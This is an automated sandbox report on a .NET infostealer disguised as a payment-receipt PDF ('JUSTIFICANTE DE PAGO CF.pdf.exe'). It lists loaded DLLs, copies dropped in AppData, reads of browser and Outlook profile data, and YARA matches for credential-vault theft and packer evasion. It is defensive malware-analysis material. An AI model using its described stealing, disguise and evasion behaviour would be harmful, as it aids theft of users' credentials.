                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dpapi.dll
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/7@3/3
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile created: C:\Users\user\AppData\Roaming\Reramvw.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMutant created: NULL
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeReversingLabs: Detection: 34%
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile read: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe "C:\Users\user\AppData\Roaming\Reramvw.exe"
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe "C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe "C:\Users\user\AppData\Roaming\Reramvw.exe"
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe "C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: protobuf-net.pdbSHA256}Lq source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdb source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.raw.unpack, ParamMockWriter.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            .NET source code contains potential unpacker
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, Template.cs.Net Code: DisableTemplate System.AppDomain.Load(byte[])
                            Source: Reramvw.exe.0.dr, Template.cs.Net Code: DisableTemplate System.AppDomain.Load(byte[])
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Yara detected Costura Assembly Loader
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.3383018.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.2bf2c1c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.3cd3160.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.3bbb5d0.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.3bc3160.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.6780000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.27ee91c.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.39f95b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.37cb5d0.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.36ab5d0.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.37c3160.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.35f95b0.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.37195b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.2d02bc8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.423b5d0.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.3aab5d0.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.290e980.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.38e3160.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.3b095b0.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.42793f0.2.raw.unpack, type: UNPACKEDPE
